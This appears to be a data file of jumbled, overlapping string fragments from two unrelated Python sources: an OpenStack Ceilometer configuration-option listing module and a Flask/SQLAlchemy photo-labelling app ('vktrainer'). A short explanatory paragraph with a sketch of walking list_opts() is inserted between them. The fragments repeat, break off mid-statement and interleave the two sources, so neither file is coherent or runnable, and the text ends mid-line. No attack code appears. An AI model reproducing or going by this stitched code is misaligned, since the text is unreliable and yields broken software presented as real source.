# FIXME(sileht): readd pollster namespaces in the generated configfile # This", "governing permissions and limitations # under the License. import itertools import socket from", "cfg import ceilometer.agent.manager import ceilometer.api.app import ceilometer.api.controllers.v2.root import ceilometer.collector import ceilometer.compute.discovery import ceilometer.compute.util", "and v3 API # with discovery. But other options are possible. return [('service_credentials',", "] def list_opts(): # FIXME(sileht): readd pollster namespaces in the generated configfile #", "# NOTE(sileht): the configuration file contains only the options # for the password", "ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain(", "or IP address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout seconds for HTTP requests. Set it to", "OR CONDITIONS OF ANY KIND, either express or implied. 
See the # License", "configuration file contains only the options # for the password plugin that handles", "obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "ceilometer.notification import ceilometer.nova_client import ceilometer.objectstore.rgw import ceilometer.objectstore.swift import ceilometer.pipeline import ceilometer.publisher.messaging import ceilometer.publisher.utils", "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may #", "ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts():", "ceilometer.compute.discovery import ceilometer.compute.util import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination", "itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher',", "v2 and v3 API # with discovery. But other options are possible. ('service_credentials',", "be an opaque identifier. For ZeroMQ only, must ' 'be a valid host", "possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS),", "('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), #", "[ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name of this node, which must be valid in", "default=600, help='Timeout seconds for HTTP requests. Set it to None to ' 'disable", "list_keystoneauth_opts(): # NOTE(sileht): the configuration file contains only the options # for the", "('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event'," ]
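The list_opts() and list_keystoneauth_opts() hooks above follow the oslo.config option-discovery convention: a generator walks the returned (group, options) pairs to emit a sample configuration file. Below is a minimal sketch of that consumption, assuming the module above is importable as ceilometer.opts (the import path is an assumption, not stated in the file itself); oslo-config-generator reaches the same hooks through setuptools entry points rather than a direct import.

# Minimal sketch: walk the (group, options) pairs returned by list_opts()
# and print each option with its default, the way a config generator would.
# Assumes ceilometer and its dependencies are installed and importable.
from ceilometer import opts  # hypothetical import path for the module above

for group, options in opts.list_opts():
    print('[%s]' % group)
    for opt in options:
        # Each entry is an oslo_config cfg.Opt exposing name/default/help.
        print('  %s = %s' % (opt.name, opt.default))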
[ "class TrainingPattern(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) name = db.Column(db.String(64))", "shutil import copyfile from flask import url_for, current_app as app from flask_login import", "'id': self.photo.id, }, 'user': self.user.name if self.user else None, 'result': result, 'id': self.id,", "any, we serve a random photo \"\"\" photos_without_results = self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if", "None # We copy the file _, filename = os.path.split(file) path = os.path.join('vktrainer',", "If there aren't any, we serve a random photo \"\"\" photos_without_results = self.photos.filter(~Photo.id.in_(", "{ 'photo': { 'name': self.photo.name, 'id': self.photo.id, }, 'user': self.user.name if self.user else", "= os.path.splitext(filename) photo = Photo(name=name, md5=md5, picture=path) db.session.add(photo) db.session.commit() return photo def get_path(self):", "show the last one previous_photo = self.photos.order_by('-id').first() return previous_photo def _get_next_photo_semi_random(self, photo): \"\"\"", "'photo': { 'name': self.photo.name, 'id': self.photo.id, }, 'user': self.user.name if self.user else None,", "get_pretty_result(self): if self.photo_is_incorrect: result = 'Photo marked as incorrect' else: try: loaded_result =", "self.user.name if self.user else None, 'result': result, 'id': self.id, 'url': self.get_absolute_url(), } @classmethod", "first photo, we show the last one previous_photo = self.photos.order_by('-id').first() return previous_photo def", "'url': self.get_absolute_url(), } @classmethod def create(cls, photo, training_set, user, result, **kwargs): training_result =", "get_results_url(self): return url_for('vktrainer.training_set_results', pk=self.id) def get_leaderboard_url(self): return url_for('vktrainer.training_set_leaderboard', pk=self.id) def get_results(self): return [tr.get_pretty_result()", "import os import random from shutil import copyfile from flask import url_for, current_app", "path) name, _ = os.path.splitext(filename) photo = Photo(name=name, md5=md5, picture=path) db.session.add(photo) db.session.commit() return", "return self.name def get_absolute_url(self): return url_for('vktrainer.training_set', pk=self.id) def get_results_url(self): return url_for('vktrainer.training_set_results', pk=self.id) def", "cls(name=name) db.session.add(user) db.session.commit() return user, True return user, False @login_manager.user_loader def load_user(userid): return", ") class User(UserMixin, db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) def __repr__(self):", "name = db.Column(db.String(64)) def __repr__(self): return self.name @classmethod def get_or_create(cls, name): user =", "# We copy the file _, filename = os.path.split(file) path = os.path.join('vktrainer', cls.PICTURES_FOLDER,", "Photo(name=name, md5=md5, picture=path) db.session.add(photo) db.session.commit() return photo def get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5) def", "url_for, current_app as app from flask_login import UserMixin from sqlalchemy import func, desc", "TrainingSet(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) photos = db.dynamic_loader( 'Photo', secondary=photos,", "as incorrect' else: try: loaded_result = json.loads(self.result) except ValueError: # Could not decode", "self.photos.order_by('id').first() return next_photo def 
_get_previous_photo_linear(self, photo): previous_photo = self.photos.filter(Photo.id < photo.id).order_by('-id').first() if not", "self.get_absolute_url(), } @classmethod def create(cls, photo, training_set, user, result, **kwargs): training_result = cls(", "user, False @login_manager.user_loader def load_user(userid): return User.query.filter(User.id == userid).first() class Photo(db.Model): id =", "photos_without_results = photos_without_results.filter(Photo.id != photo.id) nb_photos_without_results = photos_without_results.count() if nb_photos_without_results: return photos_without_results.all()[random.randint(0, nb_photos_without_results", "= db.Column(db.Integer, db.ForeignKey('user.id')) training_set = db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic')) photo = db.relation('Photo') user =", "json import os import random from shutil import copyfile from flask import url_for,", "= db.dynamic_loader( 'Photo', secondary=photos, backref=db.backref('training_sets', lazy='dynamic')) def __str__(self): return self.name def get_absolute_url(self): return", "backref=db.backref('training_results')) result = db.Column(db.Text) # Result stored in JSON photo_is_incorrect = db.Column(db.Boolean, default=False)", "def get_leaderboard(self): count = func.count(TrainingResult.id) return self.training_results.join( TrainingResult.user, ).add_column( count, ).group_by( TrainingResult.user_id, ).order_by(", "db.Table('training_set_photos', db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) ) class User(UserMixin, db.Model): id =", "in semi random mode (breaks UX) return None class TrainingPattern(db.Model): id = db.Column(db.Integer,", "return user, False @login_manager.user_loader def load_user(userid): return User.query.filter(User.id == userid).first() class Photo(db.Model): id", "return os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id) class TrainingSet(db.Model): id = db.Column(db.Integer,", "_, filename = os.path.split(file) path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file, path) name, _", "None class TrainingPattern(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) name =", "training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) name = db.Column(db.String(64)) instruction = db.Column(db.Text) training_set = db.relation('TrainingSet',", "photo \"\"\" photos_without_results = self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if photo: photos_without_results = photos_without_results.filter(Photo.id !=", "is not None: return None # We copy the file _, filename =", "* 100 def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None)", "import db, login_manager from vktrainer.utils import get_md5 photos = db.Table('training_set_photos', db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')),", "photo def get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id) class TrainingSet(db.Model):", "'Photo marked as incorrect' else: try: loaded_result = json.loads(self.result) except ValueError: # Could", "backref=db.backref('patterns', 
lazy='dynamic')) pattern_ref = db.Column(db.String(64)) position = db.Column(db.Integer) @property def pattern(self): from .patterns", "= db.Column(db.Integer) @property def pattern(self): from .patterns import REF_TO_PATTERN_CLASS try: return REF_TO_PATTERN_CLASS[self.pattern_ref] except", "self.photos.filter(Photo.id > photo.id).order_by('id').first() if not next_photo: # We are already at the last", "in self.training_results.all()] def get_leaderboard(self): count = func.count(TrainingResult.id) return self.training_results.join( TrainingResult.user, ).add_column( count, ).group_by(", "cls.query.filter(cls.name == name).first() if not user: user = cls(name=name) db.session.add(user) db.session.commit() return user,", "= cls(name=name) db.session.add(user) db.session.commit() return user, True return user, False @login_manager.user_loader def load_user(userid):", "if self.user else None, 'result': result, 'id': self.id, 'url': self.get_absolute_url(), } @classmethod def", "db.Column(db.String(64)) PICTURES_FOLDER = 'pictures/' @classmethod def create_from_file(cls, file, check_if_exists=True): # We check no", "self.photos.count() return float(nb_photos_with_results) / nb_photos * 100 def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] == 'linear':", "else None, 'result': result, 'id': self.id, 'url': self.get_absolute_url(), } @classmethod def create(cls, photo,", "-*- coding: utf-8 -*- import json import os import random from shutil import", "def get_results(self): return [tr.get_pretty_result() for tr in self.training_results.all()] def get_leaderboard(self): count = func.count(TrainingResult.id)", "backref=db.backref('training_sets', lazy='dynamic')) def __str__(self): return self.name def get_absolute_url(self): return url_for('vktrainer.training_set', pk=self.id) def get_results_url(self):", "if photo is not None: return None # We copy the file _,", "os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id) class TrainingSet(db.Model): id = db.Column(db.Integer, primary_key=True)", "self.training_results.with_entities(TrainingResult.photo_id) )) if photo: photos_without_results = photos_without_results.filter(Photo.id != photo.id) nb_photos_without_results = photos_without_results.count() if", "training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic')) pattern_ref = db.Column(db.String(64)) position = db.Column(db.Integer) @property def", "self.photo_is_incorrect: result = 'Photo marked as incorrect' else: try: loaded_result = json.loads(self.result) except", "= db.Column(db.Integer, db.ForeignKey('photo.id')) user_id = db.Column(db.Integer, db.ForeignKey('user.id')) training_set = db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic')) photo", "else: result = { 'state': 'KO', 'value': {}, } return { 'photo': {", "photos = db.Table('training_set_photos', db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) ) class User(UserMixin, db.Model):", "get_absolute_url(self): return url_for( 'vktrainer.training_set_result', training_set_pk=self.training_set.id, result_pk=self.id, ) def get_pretty_result(self): if self.photo_is_incorrect: result =", "get_results(self): return [tr.get_pretty_result() for tr in self.training_results.all()] def get_leaderboard(self): count = func.count(TrainingResult.id) return", "are already at the first photo, we show the last one 
previous_photo =", "db.Column(db.String(64)) photos = db.dynamic_loader( 'Photo', secondary=photos, backref=db.backref('training_sets', lazy='dynamic')) def __str__(self): return self.name def", "None if loaded_result: result = { 'state': 'OK', 'value': loaded_result, } else: result", "photo without any results If there aren't any, we serve a random photo", "db.Column(db.String(64)) def __repr__(self): return self.name @classmethod def get_or_create(cls, name): user = cls.query.filter(cls.name ==", "return User.query.filter(User.id == userid).first() class Photo(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64))", "False @login_manager.user_loader def load_user(userid): return User.query.filter(User.id == userid).first() class Photo(db.Model): id = db.Column(db.Integer,", "Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos = self.photos.count() return float(nb_photos_with_results) / nb_photos * 100 def get_first_photo(self):", "create(cls, photo, training_set, user, result, **kwargs): training_result = cls( photo=photo, training_set=training_set, user=user, result=result,", "load_user(userid): return User.query.filter(User.id == userid).first() class Photo(db.Model): id = db.Column(db.Integer, primary_key=True) name =", ") def get_pretty_result(self): if self.photo_is_incorrect: result = 'Photo marked as incorrect' else: try:", "db.Column(db.String(64)) picture = db.Column(db.String(128)) md5 = db.Column(db.String(64)) PICTURES_FOLDER = 'pictures/' @classmethod def create_from_file(cls,", "= None if loaded_result: result = { 'state': 'OK', 'value': loaded_result, } else:", "loaded_result, } else: result = { 'state': 'KO', 'value': {}, } return {", "= os.path.split(file) path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file, path) name, _ = os.path.splitext(filename)", "= cls.query.filter(cls.name == name).first() if not user: user = cls(name=name) db.session.add(user) db.session.commit() return", "next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first() if not next_photo: # We are already at", "(breaks UX) return None class TrainingPattern(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer,", "pk=self.id) def get_results(self): return [tr.get_pretty_result() for tr in self.training_results.all()] def get_leaderboard(self): count =", "pk=self.id) def get_leaderboard_url(self): return url_for('vktrainer.training_set_leaderboard', pk=self.id) def get_results(self): return [tr.get_pretty_result() for tr in", "'name': self.photo.name, 'id': self.photo.id, }, 'user': self.user.name if self.user else None, 'result': result,", "We check no photo with the same md5 already exists in db md5", "serve a random photo without any results If there aren't any, we serve", "TrainingResult.user, ).add_column( count, ).group_by( TrainingResult.user_id, ).order_by( desc(count), ).values( User.name, count, ) def get_percentage_done(self):", "result, 'id': self.id, 'url': self.get_absolute_url(), } @classmethod def create(cls, photo, training_set, user, result,", "user = cls(name=name) db.session.add(user) db.session.commit() return user, True return user, False @login_manager.user_loader def", "db.Column(db.String(64)) instruction = db.Column(db.Text) training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic')) pattern_ref = db.Column(db.String(64)) position", "import random from shutil import copyfile from flask import 
url_for, current_app as app", "without any results If there aren't any, we serve a random photo \"\"\"", "= db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) def __repr__(self): return self.name @classmethod def get_or_create(cls,", "# Result stored in JSON photo_is_incorrect = db.Column(db.Boolean, default=False) def get_absolute_url(self): return url_for(", "= self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos = self.photos.count() return float(nb_photos_with_results) / nb_photos * 100", "'linear': return self._get_next_photo_linear(photo) else: return self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self, photo): next_photo = self.photos.filter(Photo.id >", "get_md5(file) if check_if_exists: photo = cls.query.filter_by(md5=md5).first() if photo is not None: return None", "return { 'photo': { 'name': self.photo.name, 'id': self.photo.id, }, 'user': self.user.name if self.user", "= db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id = db.Column(db.Integer, db.ForeignKey('photo.id')) user_id =", "db.Integer, db.ForeignKey('photo.id')) ) class User(UserMixin, db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64))", "from flask import url_for, current_app as app from flask_login import UserMixin from sqlalchemy", "result = { 'state': 'OK', 'value': loaded_result, } else: result = { 'state':", "return [tr.get_pretty_result() for tr in self.training_results.all()] def get_leaderboard(self): count = func.count(TrainingResult.id) return self.training_results.join(", "True return user, False @login_manager.user_loader def load_user(userid): return User.query.filter(User.id == userid).first() class Photo(db.Model):", "'id': self.id, 'url': self.get_absolute_url(), } @classmethod def create(cls, photo, training_set, user, result, **kwargs):", "flask import url_for, current_app as app from flask_login import UserMixin from sqlalchemy import", "[tr.get_pretty_result() for tr in self.training_results.all()] def get_leaderboard(self): count = func.count(TrainingResult.id) return self.training_results.join( TrainingResult.user,", "desc(count), ).values( User.name, count, ) def get_percentage_done(self): nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos", "return url_for('vktrainer.training_set', pk=self.id) def get_results_url(self): return url_for('vktrainer.training_set_results', pk=self.id) def get_leaderboard_url(self): return url_for('vktrainer.training_set_leaderboard', pk=self.id)", "== 'linear': return self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None) def get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING'] ==", "return self.training_results.join( TrainingResult.user, ).add_column( count, ).group_by( TrainingResult.user_id, ).order_by( desc(count), ).values( User.name, count, )", "if self.photo_is_incorrect: result = 'Photo marked as incorrect' else: try: loaded_result = json.loads(self.result)", "self.user else None, 'result': result, 'id': self.id, 'url': self.get_absolute_url(), } @classmethod def create(cls,", "primary_key=True) name = db.Column(db.String(64)) def __repr__(self): return self.name @classmethod def get_or_create(cls, name): user", "KeyError: raise KeyError('Unknown pattern: {}'.format(self.pattern_ref)) class 
TrainingResult(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id =", "= 'Photo marked as incorrect' else: try: loaded_result = json.loads(self.result) except ValueError: #", "REF_TO_PATTERN_CLASS[self.pattern_ref] except KeyError: raise KeyError('Unknown pattern: {}'.format(self.pattern_ref)) class TrainingResult(db.Model): id = db.Column(db.Integer, primary_key=True)", "get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id) class TrainingSet(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64))", "primary_key=True) name = db.Column(db.String(64)) picture = db.Column(db.String(128)) md5 = db.Column(db.String(64)) PICTURES_FOLDER = 'pictures/'", "photo): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self._get_next_photo_linear(photo) else: return self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self, photo):", "training_result = cls( photo=photo, training_set=training_set, user=user, result=result, **kwargs ) db.session.add(training_result) db.session.commit() return training_result", "= self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if photo: photos_without_results = photos_without_results.filter(Photo.id != photo.id) nb_photos_without_results =", "stored in JSON photo_is_incorrect = db.Column(db.Boolean, default=False) def get_absolute_url(self): return url_for( 'vktrainer.training_set_result', training_set_pk=self.training_set.id,", "filename = os.path.split(file) path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file, path) name, _ =", "url_for('vktrainer.training_set', pk=self.id) def get_results_url(self): return url_for('vktrainer.training_set_results', pk=self.id) def get_leaderboard_url(self): return url_for('vktrainer.training_set_leaderboard', pk=self.id) def", "nb_photos = self.photos.count() random_nb = random.randint(0, nb_photos - 1) return self.photos.all()[random_nb] def _get_previous_photo_semi_random(self,", "previous_photo def _get_next_photo_semi_random(self, photo): \"\"\" We serve a random photo without any results", "user = db.relation('User', lazy='joined', backref=db.backref('training_results')) result = db.Column(db.Text) # Result stored in JSON", "if check_if_exists: photo = cls.query.filter_by(md5=md5).first() if photo is not None: return None #", "100 def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None) def", "1) return self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo): # Don't want to allow previous photo", "} else: result = { 'state': 'KO', 'value': {}, } return { 'photo':", "result = { 'state': 'KO', 'value': {}, } return { 'photo': { 'name':", "float(nb_photos_with_results) / nb_photos * 100 def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self.photos.order_by('id').first()", "photo = Photo(name=name, md5=md5, picture=path) db.session.add(photo) db.session.commit() return photo def get_path(self): return os.path.join(self.PICTURES_FOLDER,", "except KeyError: raise KeyError('Unknown pattern: {}'.format(self.pattern_ref)) class TrainingResult(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id", "if nb_photos_without_results: return photos_without_results.all()[random.randint(0, nb_photos_without_results - 1)] else: nb_photos = self.photos.count() random_nb =", "- 1)] else: 
nb_photos = self.photos.count() random_nb = random.randint(0, nb_photos - 1) return", "def get_or_create(cls, name): user = cls.query.filter(cls.name == name).first() if not user: user =", "None: return None # We copy the file _, filename = os.path.split(file) path", "Don't want to allow previous photo in semi random mode (breaks UX) return", "import func, desc # from vktrainer import db, app, login_manager from vktrainer import", "'linear': return self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None) def get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING'] == 'linear':", "# Don't want to allow previous photo in semi random mode (breaks UX)", "app from flask_login import UserMixin from sqlalchemy import func, desc # from vktrainer", "**kwargs): training_result = cls( photo=photo, training_set=training_set, user=user, result=result, **kwargs ) db.session.add(training_result) db.session.commit() return", "photo is not None: return None # We copy the file _, filename", "return url_for('vktrainer.training_set_results', pk=self.id) def get_leaderboard_url(self): return url_for('vktrainer.training_set_leaderboard', pk=self.id) def get_results(self): return [tr.get_pretty_result() for", "name): user = cls.query.filter(cls.name == name).first() if not user: user = cls(name=name) db.session.add(user)", ").group_by( TrainingResult.user_id, ).order_by( desc(count), ).values( User.name, count, ) def get_percentage_done(self): nb_photos_with_results = self.photos.filter(", "from .patterns import REF_TO_PATTERN_CLASS try: return REF_TO_PATTERN_CLASS[self.pattern_ref] except KeyError: raise KeyError('Unknown pattern: {}'.format(self.pattern_ref))", "import copyfile from flask import url_for, current_app as app from flask_login import UserMixin", "db.session.add(photo) db.session.commit() return photo def get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self): return url_for('vktrainer.show_photo',", "pattern(self): from .patterns import REF_TO_PATTERN_CLASS try: return REF_TO_PATTERN_CLASS[self.pattern_ref] except KeyError: raise KeyError('Unknown pattern:", "count = func.count(TrainingResult.id) return self.training_results.join( TrainingResult.user, ).add_column( count, ).group_by( TrainingResult.user_id, ).order_by( desc(count), ).values(", "last one previous_photo = self.photos.order_by('-id').first() return previous_photo def _get_next_photo_semi_random(self, photo): \"\"\" We serve", "nb_photos_without_results - 1)] else: nb_photos = self.photos.count() random_nb = random.randint(0, nb_photos - 1)", "lazy='joined', backref=db.backref('training_results')) result = db.Column(db.Text) # Result stored in JSON photo_is_incorrect = db.Column(db.Boolean,", "the last one previous_photo = self.photos.order_by('-id').first() return previous_photo def _get_next_photo_semi_random(self, photo): \"\"\" We", "def get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id) class TrainingSet(db.Model): id", "nb_photos = self.photos.count() return float(nb_photos_with_results) / nb_photos * 100 def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING']", "def get_absolute_url(self): return url_for( 'vktrainer.training_set_result', training_set_pk=self.training_set.id, result_pk=self.id, ) def get_pretty_result(self): if self.photo_is_incorrect: result", "primary_key=True) training_set_id = db.Column(db.Integer, 
db.ForeignKey('training_set.id')) name = db.Column(db.String(64)) instruction = db.Column(db.Text) training_set =", "return self._get_next_photo_linear(photo) else: return self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self, photo): next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first()", "'OK', 'value': loaded_result, } else: result = { 'state': 'KO', 'value': {}, }", "= self.photos.order_by('-id').first() return previous_photo def _get_next_photo_semi_random(self, photo): \"\"\" We serve a random photo", "nb_photos_without_results = photos_without_results.count() if nb_photos_without_results: return photos_without_results.all()[random.randint(0, nb_photos_without_results - 1)] else: nb_photos =", "db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id = db.Column(db.Integer, db.ForeignKey('photo.id')) user_id = db.Column(db.Integer, db.ForeignKey('user.id')) training_set = db.relation('TrainingSet',", "id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) picture = db.Column(db.String(128)) md5 = db.Column(db.String(64))", "\"\"\" We serve a random photo without any results If there aren't any,", ").order_by( desc(count), ).values( User.name, count, ) def get_percentage_done(self): nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count()", "tr in self.training_results.all()] def get_leaderboard(self): count = func.count(TrainingResult.id) return self.training_results.join( TrainingResult.user, ).add_column( count,", "ValueError: # Could not decode JSON loaded_result = None if loaded_result: result =", "previous photo in semi random mode (breaks UX) return None class TrainingPattern(db.Model): id", "# We are already at the first photo, we show the last one", "= self.photos.order_by('id').first() return next_photo def _get_previous_photo_linear(self, photo): previous_photo = self.photos.filter(Photo.id < photo.id).order_by('-id').first() if", "md5 = get_md5(file) if check_if_exists: photo = cls.query.filter_by(md5=md5).first() if photo is not None:", "= db.relation('User', lazy='joined', backref=db.backref('training_results')) result = db.Column(db.Text) # Result stored in JSON photo_is_incorrect", "incorrect' else: try: loaded_result = json.loads(self.result) except ValueError: # Could not decode JSON", "return self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo): # Don't want to allow previous photo in", "= db.Column(db.Text) training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic')) pattern_ref = db.Column(db.String(64)) position = db.Column(db.Integer)", "the file _, filename = os.path.split(file) path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file, path)", "url_for( 'vktrainer.training_set_result', training_set_pk=self.training_set.id, result_pk=self.id, ) def get_pretty_result(self): if self.photo_is_incorrect: result = 'Photo marked", "userid).first() class Photo(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) picture = db.Column(db.String(128))", "photo = cls.query.filter_by(md5=md5).first() if photo is not None: return None # We copy", "db.session.commit() return photo def get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id)", "= db.Column(db.String(64)) instruction = db.Column(db.Text) training_set = db.relation('TrainingSet', 
backref=db.backref('patterns', lazy='dynamic')) pattern_ref = db.Column(db.String(64))", "training_set = db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic')) photo = db.relation('Photo') user = db.relation('User', lazy='joined', backref=db.backref('training_results'))", "already at the last photo, we show the first one next_photo = self.photos.order_by('id').first()", "md5 = db.Column(db.String(64)) PICTURES_FOLDER = 'pictures/' @classmethod def create_from_file(cls, file, check_if_exists=True): # We", "user = cls.query.filter(cls.name == name).first() if not user: user = cls(name=name) db.session.add(user) db.session.commit()", "from sqlalchemy import func, desc # from vktrainer import db, app, login_manager from", "= db.Column(db.String(64)) def __repr__(self): return self.name @classmethod def get_or_create(cls, name): user = cls.query.filter(cls.name", "are already at the last photo, we show the first one next_photo =", "'result': result, 'id': self.id, 'url': self.get_absolute_url(), } @classmethod def create(cls, photo, training_set, user,", "get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None) def get_next_photo(self, photo):", "user, result, **kwargs): training_result = cls( photo=photo, training_set=training_set, user=user, result=result, **kwargs ) db.session.add(training_result)", "name, _ = os.path.splitext(filename) photo = Photo(name=name, md5=md5, picture=path) db.session.add(photo) db.session.commit() return photo", "serve a random photo \"\"\" photos_without_results = self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if photo: photos_without_results", "def get_percentage_done(self): nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos = self.photos.count() return float(nb_photos_with_results) /", "in db md5 = get_md5(file) if check_if_exists: photo = cls.query.filter_by(md5=md5).first() if photo is", "file _, filename = os.path.split(file) path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file, path) name,", "path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file, path) name, _ = os.path.splitext(filename) photo =", "lazy='dynamic')) pattern_ref = db.Column(db.String(64)) position = db.Column(db.Integer) @property def pattern(self): from .patterns import", "nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos = self.photos.count() return float(nb_photos_with_results) / nb_photos *", "photo): previous_photo = self.photos.filter(Photo.id < photo.id).order_by('-id').first() if not 